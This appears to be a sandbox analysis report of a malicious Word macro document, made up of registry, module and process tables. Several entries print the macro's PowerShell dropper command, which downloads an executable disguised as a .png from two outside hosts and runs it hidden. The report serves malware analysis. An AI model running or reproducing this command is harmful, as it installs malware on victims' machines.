| Read Value | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\0\win64 | data = C:\Program Files\Microsoft Office\Office15\MSWORD.OLB |
|
3 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 | data = C:\Windows\system32\stdole2.tlb |
|
2 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.7\0\win64 | data = C:\Program Files\Common Files\Microsoft Shared\OFFICE15\MSO.DLL |
|
2 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046}\4.2\9\win64 | data = C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA7.1\VBE7.DLL |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{0D452EE1-E08F-101A-852E-02608C4D0BB4}\2.0\0\win64 | data = C:\Windows\system32\FM20.DLL |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\Clsid\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\InprocServer32 | value_name = ThreadingModel, data = 65 |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\Clsid\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\Instance CLSID | data = {C62A69F0-16DC-11CE-9E98-00AA00574A4F} |
|
6 | |
| Write Value | value_name = PropertiesWindow, data = 4 24 180 720 1, size = 15, type = REG_SZ |
|
1 | ||
| Write Value | value_name = MainWindow, data = 0 0 0 0 1, size = 10, type = REG_SZ |
|
1 | ||
| Write Value | value_name = MdiMaximized, data = 0, size = 2, type = REG_SZ |
|
1 | ||
| Write Value | value_name = FolderView, data = 1, size = 2, type = REG_SZ |
|
1 | ||
| Write Value | value_name = Tool, size = 24, type = REG_BINARY |
|
1 | ||
| Write Value | value_name = CtlsShowSelected, data = 0, size = 2, type = REG_SZ |
|
1 | ||
| Write Value | value_name = DsnShowSelected, data = 0, size = 2, type = REG_SZ |
|
1 | ||
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} |
|
1 | ||
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} |
|
1 | ||
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} |
|
1 | ||
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | ||
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | ||
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046} |
|
1 | ||
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046} |
|
1 | ||
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} |
|
1 | ||
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} |
|
1 | ||
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} |
|
1 | ||
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | ||
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | ||
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{0D452EE1-E08F-101A-852E-02608C4D0BB4} |
|
1 | ||
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | cmd /c PowerShell "'PowerShell ""function mihyr8([String] $yxuinzaisib){(New-Object System.Net.WebClient).DownloadFile($yxuinzaisib,''%TMP%\Mvmubw.exe'');Start-Process ''%TMP%\Mvmubw.exe'';}try{mihyr8(''http://www.events4u.cz/kas23.png'')}catch{mihyr8(''http://tregartha-dinnie.co.uk/kas23.png'')}'"" | Out-File -encoding ASCII -FilePath %TMP%\Mbovxo.bat;Start-Process '%TMP%\Mbovxo.bat' -WindowStyle Hidden" | os_pid = 0x9e0, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL | base_address = 0x7fee8aa0000 |
|
1 | |
| Get Handle | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\system32\user32.dll | base_address = 0x77440000 |
|
1 | |
| Get Handle | oleaut32.dll | base_address = 0x7feff5d0000 |
|
1 | |
| Get Handle | ole32.dll | base_address = 0x7fefede0000 |
|
1 | |
| Get Filename | process_name = c:\program files\microsoft office\office15\winword.exe, file_name_orig = C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA7.1\VBE7.DLL, size = 260 |
|
4 | ||
| Get Address | Unknown module name | function = MsoVBADigSigCallDlg, address_out = 0x7fee8bad128 |
|
1 | |
| Get Address | Unknown module name | function = MsoVbaInitSecurity, address_out = 0x7fee8b1a204 |
|
1 | |
| Get Address | Unknown module name | function = MsoFIEPolicyAndVersion, address_out = 0x7fee8ac24b8 |
|
1 | |
| Get Address | Unknown module name | function = MsoFAnsiCodePageSupportsLCID, address_out = 0x7fee8b1a09c |
|
1 | |
| Get Address | Unknown module name | function = MsoFInitOffice, address_out = 0x7fee8abf98c |
|
1 | |
| Get Address | Unknown module name | function = MsoUninitOffice, address_out = 0x7fee8aaec34 |
|
1 | |
| Get Address | Unknown module name | function = MsoFGetFontSettings, address_out = 0x7fee8aa3fac |
|
1 | |
| Get Address | Unknown module name | function = MsoRgchToRgwch, address_out = 0x7fee8ab2878 |
|
1 | |
| Get Address | Unknown module name | function = MsoHrSimpleQueryInterface, address_out = 0x7fee8aa7a5c |
|
1 | |
| Get Address | Unknown module name | function = MsoHrSimpleQueryInterface2, address_out = 0x7fee8aa79d4 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateControl, address_out = 0x7fee8aa870c |
|
1 | |
| Get Address | Unknown module name | function = MsoFLongLoad, address_out = 0x7fee8becb78 |
|
1 | |
| Get Address | Unknown module name | function = MsoFLongSave, address_out = 0x7fee8becb9c |
|
1 | |
| Get Address | Unknown module name | function = MsoFGetTooltips, address_out = 0x7fee8ab23e0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFSetTooltips, address_out = 0x7fee8b1a49c |
|
1 | |
| Get Address | Unknown module name | function = MsoFLoadToolbarSet, address_out = 0x7fee8b07d64 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateToolbarSet, address_out = 0x7fee8aa55d0 |
|
1 | |
| Get Address | Unknown module name | function = MsoHpalOffice, address_out = 0x7fee8ab05e0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFWndProcNeeded, address_out = 0x7fee8aa3cd4 |
|
1 | |
| Get Address | Unknown module name | function = MsoFWndProc, address_out = 0x7fee8aa6c80 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateITFCHwnd, address_out = 0x7fee8aa3d08 |
|
1 | |
| Get Address | Unknown module name | function = MsoDestroyITFC, address_out = 0x7fee8aaeaa0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFPitbsFromHwndAndMsg, address_out = 0x7fee8aae064 |
|
1 | |
| Get Address | Unknown module name | function = MsoFGetComponentManager, address_out = 0x7fee8aa7af0 |
|
1 | |
| Get Address | Unknown module name | function = MsoMultiByteToWideChar, address_out = 0x7fee8ab005c |
|
2 | |
| Get Address | Unknown module name | function = MsoWideCharToMultiByte, address_out = 0x7fee8aa8b00 |
|
1 | |
| Get Address | Unknown module name | function = MsoHrRegisterAll, address_out = 0x7fee8bacb04 |
|
1 | |
| Get Address | Unknown module name | function = MsoFSetComponentManager, address_out = 0x7fee8ab47c4 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateStdComponentManager, address_out = 0x7fee8aa3e0c |
|
1 | |
| Get Address | Unknown module name | function = MsoFHandledMessageNeeded, address_out = 0x7fee8aaab58 |
|
1 | |
| Get Address | Unknown module name | function = MsoPeekMessage, address_out = 0x7fee8aaa820 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateIPref, address_out = 0x7fee8aa15ac |
|
1 | |
| Get Address | Unknown module name | function = MsoDestroyIPref, address_out = 0x7fee8aaebfc |
|
1 | |
| Get Address | Unknown module name | function = MsoChsFromLid, address_out = 0x7fee8aa1414 |
|
1 | |
| Get Address | Unknown module name | function = MsoCpgFromChs, address_out = 0x7fee8aa65d4 |
|
1 | |
| Get Address | Unknown module name | function = MsoSetLocale, address_out = 0x7fee8aa1554 |
|
1 | |
| Get Address | Unknown module name | function = MsoFSetHMsoinstOfSdm, address_out = 0x7fee8aa3dbc |
|
1 | |
| Get Address | Unknown module name | function = MsoSetVbaInterfaces, address_out = 0x7fee8bad23c |
|
1 | |
| Get Address | Unknown module name | function = MsoGetControlInstanceId, address_out = 0x7fee8b7733c |
|
1 | |
| Get Address | Unknown module name | function = SysFreeString, address_out = 0x7feff5d1320 |
|
1 | |
| Get Address | Unknown module name | function = LoadTypeLib, address_out = 0x7feff5df1e0 |
|
1 | |
| Get Address | Unknown module name | function = RegisterTypeLib, address_out = 0x7feff62caa0 |
|
1 | |
| Get Address | Unknown module name | function = QueryPathOfRegTypeLib, address_out = 0x7feff661760 |
|
1 | |
| Get Address | Unknown module name | function = UnRegisterTypeLib, address_out = 0x7feff6620d0 |
|
2 | |
| Get Address | Unknown module name | function = OleTranslateColor, address_out = 0x7feff5fc760 |
|
1 | |
| Get Address | Unknown module name | function = OleCreateFontIndirect, address_out = 0x7feff62ecd0 |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePictureIndirect, address_out = 0x7feff62e840 |
|
1 | |
| Get Address | Unknown module name | function = OleLoadPicture, address_out = 0x7feff63f420 |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePropertyFrameIndirect, address_out = 0x7feff634ec0 |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePropertyFrame, address_out = 0x7feff639350 |
|
1 | |
| Get Address | Unknown module name | function = OleIconToCursor, address_out = 0x7feff606e40 |
|
1 | |
| Get Address | Unknown module name | function = LoadTypeLibEx, address_out = 0x7feff5da550 |
|
2 | |
| Get Address | Unknown module name | function = OleLoadPictureEx, address_out = 0x7feff63f320 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = GetSystemMetrics, address_out = 0x774594f0 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = MonitorFromWindow, address_out = 0x77455f08 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = MonitorFromRect, address_out = 0x77452b00 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = MonitorFromPoint, address_out = 0x7744ab64 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = EnumDisplayMonitors, address_out = 0x77455c30 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = GetMonitorInfoA, address_out = 0x7744a730 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = EnumDisplayDevicesA, address_out = 0x7744a5b4 |
|
1 | |
| Get Address | Unknown module name | function = DispCallFunc, address_out = 0x7feff5d2270 |
|
1 | |
| Get Address | Unknown module name | function = CreateTypeLib2, address_out = 0x7feff65dbd0 |
|
1 | |
| Get Address | Unknown module name | function = VarDateFromUdate, address_out = 0x7feff5d5c90 |
|
1 | |
| Get Address | Unknown module name | function = VarUdateFromDate, address_out = 0x7feff5d6330 |
|
1 | |
| Get Address | Unknown module name | function = GetAltMonthNames, address_out = 0x7feff5f66c0 |
|
1 | |
| Get Address | Unknown module name | function = VarNumFromParseNum, address_out = 0x7feff5d4710 |
|
1 | |
| Get Address | Unknown module name | function = VarParseNumFromStr, address_out = 0x7feff5d48f0 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromR4, address_out = 0x7feff60b640 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromR8, address_out = 0x7feff60b360 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromDate, address_out = 0x7feff612640 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromI4, address_out = 0x7feff5f58a0 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromCy, address_out = 0x7feff5f5820 |
|
1 | |
| Get Address | Unknown module name | function = VarR4FromDec, address_out = 0x7feff60af20 |
|
1 | |
| Get Address | Unknown module name | function = GetRecordInfoFromTypeInfo, address_out = 0x7feff62a0c0 |
|
1 | |
| Get Address | Unknown module name | function = GetRecordInfoFromGuids, address_out = 0x7feff662160 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayGetRecordInfo, address_out = 0x7feff5f5af0 |
|
1 | |
| Get Address | Unknown module name | function = SafeArraySetRecordInfo, address_out = 0x7feff5f5a90 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayGetIID, address_out = 0x7feff5f5a60 |
|
1 | |
| Get Address | Unknown module name | function = SafeArraySetIID, address_out = 0x7feff5f5a30 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayCopyData, address_out = 0x7feff5d60b0 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayAllocDescriptorEx, address_out = 0x7feff5d3e90 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayCreateEx, address_out = 0x7feff629f80 |
|
1 | |
| Get Address | Unknown module name | function = VarFormat, address_out = 0x7feff659b20 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatDateTime, address_out = 0x7feff659aa0 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatNumber, address_out = 0x7feff659990 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatPercent, address_out = 0x7feff659890 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatCurrency, address_out = 0x7feff659770 |
|
1 | |
| Get Address | Unknown module name | function = VarWeekdayName, address_out = 0x7feff63b8d0 |
|
1 | |
| Get Address | Unknown module name | function = VarMonthName, address_out = 0x7feff63b800 |
|
1 | |
| Get Address | Unknown module name | function = VarAdd, address_out = 0x7feff6548e0 |
|
1 | |
| Get Address | Unknown module name | function = VarAnd, address_out = 0x7feff659470 |
|
1 | |
| Get Address | Unknown module name | function = VarCat, address_out = 0x7feff6596a0 |
|
1 | |
| Get Address | Unknown module name | function = VarDiv, address_out = 0x7feff652fe0 |
|
1 | |
| Get Address | Unknown module name | function = VarEqv, address_out = 0x7feff659cf0 |
|
1 | |
| Get Address | Unknown module name | function = VarIdiv, address_out = 0x7feff658ff0 |
|
1 | |
| Get Address | Unknown module name | function = VarImp, address_out = 0x7feff659c00 |
|
1 | |
| Get Address | Unknown module name | function = VarMod, address_out = 0x7feff658e60 |
|
1 | |
| Get Address | Unknown module name | function = VarMul, address_out = 0x7feff653690 |
|
1 | |
| Get Address | Unknown module name | function = VarOr, address_out = 0x7feff6592d0 |
|
1 | |
| Get Address | Unknown module name | function = VarPow, address_out = 0x7feff652e80 |
|
1 | |
| Get Address | Unknown module name | function = VarSub, address_out = 0x7feff653f90 |
|
1 | |
| Get Address | Unknown module name | function = VarXor, address_out = 0x7feff6591a0 |
|
1 | |
| Get Address | Unknown module name | function = VarAbs, address_out = 0x7feff637c30 |
|
1 | |
| Get Address | Unknown module name | function = VarFix, address_out = 0x7feff637a60 |
|
1 | |
| Get Address | Unknown module name | function = VarInt, address_out = 0x7feff637890 |
|
1 | |
| Get Address | Unknown module name | function = VarNeg, address_out = 0x7feff637ea0 |
|
1 | |
| Get Address | Unknown module name | function = VarNot, address_out = 0x7feff659600 |
|
1 | |
| Get Address | Unknown module name | function = VarRound, address_out = 0x7feff6376a0 |
|
1 | |
| Get Address | Unknown module name | function = VarCmp, address_out = 0x7feff6583f0 |
|
1 | |
| Get Address | Unknown module name | function = VarDecAdd, address_out = 0x7feff603070 |
|
1 | |
| Get Address | Unknown module name | function = VarDecCmp, address_out = 0x7feff60d700 |
|
1 | |
| Get Address | Unknown module name | function = VarBstrCat, address_out = 0x7feff60d890 |
|
1 | |
| Get Address | Unknown module name | function = VarCyMulI4, address_out = 0x7feff5ecaf0 |
|
1 | |
| Get Address | Unknown module name | function = VarBstrCmp, address_out = 0x7feff5f8a00 |
|
1 | |
| Get Address | Unknown module name | function = CoCreateInstanceEx, address_out = 0x7fefedede90 |
|
1 | |
| Get Address | Unknown module name | function = CLSIDFromProgIDEx, address_out = 0x7fefedfa4c4 |
|
1 | |
| Get Address | Unknown module name | function = RegisterTypeLibForUser, address_out = 0x7feff626430 |
|
1 | |
| Get Address | c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll | function = ImageList_Destroy, address_out = 0x7fefc0207a4 |
|
1 | |
| Get Address | c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll | function = ImageList_GetIconSize, address_out = 0x7fefc021010 |
|
1 | |
| Get Address | c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll | function = InitCommonControls, address_out = 0x7fefc0f8b5c |
|
1 | |
| Get Address | c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll | function = ImageList_LoadImageA, address_out = 0x7fefc0201a8 |
|
1 | |
| Get Address | c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll | function = ImageList_SetOverlayImage, address_out = 0x7fefc020a70 |
|
1 | |
| Get Address | c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll | function = ImageList_AddMasked, address_out = 0x7fefc020b60 |
|
1 | |
| Get Address | c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll | function = ImageList_GetImageInfo, address_out = 0x7fefc021180 |
|
1 | |
| Get Address | c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll | function = ImageList_Draw, address_out = 0x7fefc020cd8 |
|
1 | |
| Get Address | c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll | function = ImageList_DrawEx, address_out = 0x7fefc020bdc |
|
1 | |
| Get Address | c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll | function = PropertySheetA, address_out = 0x7fefc005c64 |
|
1 | |
| Get Address | c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll | function = DestroyPropertySheetPage, address_out = 0x7fefbfff018 |
|
1 | |
| Get Address | c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll | function = CreatePropertySheetPageA, address_out = 0x7fefbfffce8 |
|
1 | |
| Get Address | Unknown module name | function = 600, address_out = 0x7fee8df9f28 |
|
3 | |
| Get Address | Unknown module name | function = 594, address_out = 0x7fee8f97268 |
|
3 | |
| Get Address | Unknown module name | function = 593, address_out = 0x7fee8f97298 |
|
3 | |
| Get Address | Unknown module name | function = 632, address_out = 0x7fee8e22778 |
|
3 | |
| Get Address | Unknown module name | function = 681, address_out = 0x7fee8f968e0 |
|
3 |
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Set Attribute | index = 18446744073709551596, new_long = 262401 |
|
4 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Cursor | x_out = 17, y_out = 631 |
|
2 | |
| Get Time | type = Local Time, time = 2017-09-26 00:02:34 (Local Time) |
|
1 | |
| Get Time | type = Local Time, time = 2017-09-26 00:02:35 (Local Time) |
|
19 | |
| Get Time | type = Local Time, time = 2017-09-26 00:02:38 (Local Time) |
|
11 | |
| Get Info | type = Operating System |
|
2 | |
| Get Info | type = Operating System |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = DDRYBUR |
|
1 |
| Information | Value |
|---|---|
| ID | #2 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | cmd /c PowerShell "'PowerShell ""function mihyr8([String] $yxuinzaisib){(New-Object System.Net.WebClient).DownloadFile($yxuinzaisib,''%TMP%\Mvmubw.exe'');Start-Process ''%TMP%\Mvmubw.exe'';}try{mihyr8(''http://www.events4u.cz/kas23.png'')}catch{mihyr8(''http://tregartha-dinnie.co.uk/kas23.png'')}'"" | Out-File -encoding ASCII -FilePath %TMP%\Mbovxo.bat;Start-Process '%TMP%\Mbovxo.bat' -WindowStyle Hidden" |
| Initial Working Directory | C:\Users\aDU0VK IWA5kLS\Desktop\ |
| Monitor | Start Time: 00:00:36, Reason: Child Process |
| Unmonitor | End Time: 00:02:26, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:50 |
| Information | Value |
|---|---|
| PID | 0x9e0 |
| Parent PID | 0x914 (c:\program files\microsoft office\office15\winword.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | AUFDDCNTXWT\aDU0VK IWA5kLS |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
9E4
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\aDU0VK IWA5kLS\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE |
|
5 | ||
| Open | STD_INPUT_HANDLE |
|
3 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | ||
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | os_pid = 0x9f8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x49e70000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x77320000 |
|
2 | |
| Get Filename | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | ||
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x77336d40 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x773323d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x77328290 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x773317e0 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2017-09-25 20:32:39 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 70231 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String |
|
7 | ||
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = TMP, result_out = C:\Users\ADU0VK~1\AppData\Local\Temp |
|
4 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\aDU0VK IWA5kLS\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | PowerShell "'PowerShell ""function mihyr8([String] $yxuinzaisib){(New-Object System.Net.WebClient).DownloadFile($yxuinzaisib,''C:\Users\ADU0VK~1\AppData\Local\Temp\Mvmubw.exe'');Start-Process ''C:\Users\ADU0VK~1\AppData\Local\Temp\Mvmubw.exe'';}try{mihyr8(''http://www.events4u.cz/kas23.png'')}catch{mihyr8(''http://tregartha-dinnie.co.uk/kas23.png'')}'"" | Out-File -encoding ASCII -FilePath C:\Users\ADU0VK~1\AppData\Local\Temp\Mbovxo.bat;Start-Process 'C:\Users\ADU0VK~1\AppData\Local\Temp\Mbovxo.bat' -WindowStyle Hidden" |
| Initial Working Directory | C:\Users\aDU0VK IWA5kLS\Desktop\ |
| Monitor | Start Time: 00:00:37, Reason: Child Process |
| Unmonitor | End Time: 00:02:26, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:49 |
| Information | Value |
|---|---|
| PID | 0x9f8 |
| Parent PID | 0x9e0 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | AUFDDCNTXWT\aDU0VK IWA5kLS |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
9FC
0x
A00
0x
A04
0x
A08
0x
A0C
0x
A10
0x
A1C
0x
A20
0x
A3C
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\adu0vk iwa5kls\appdata\local\temp\mbovxo.bat | 0.32 KB (332 bytes) |
MD5:
6b02cf51939341cf79053976790bdae0
SHA1: 7d1615ea6d3afc59f7f518b1fd49bd0ae2c2b1ed SHA256: 845ed9e3626f3b603301c7ab1987d763c13a9d8ee4444e69f181e52ebb881252 |
|
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
2 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
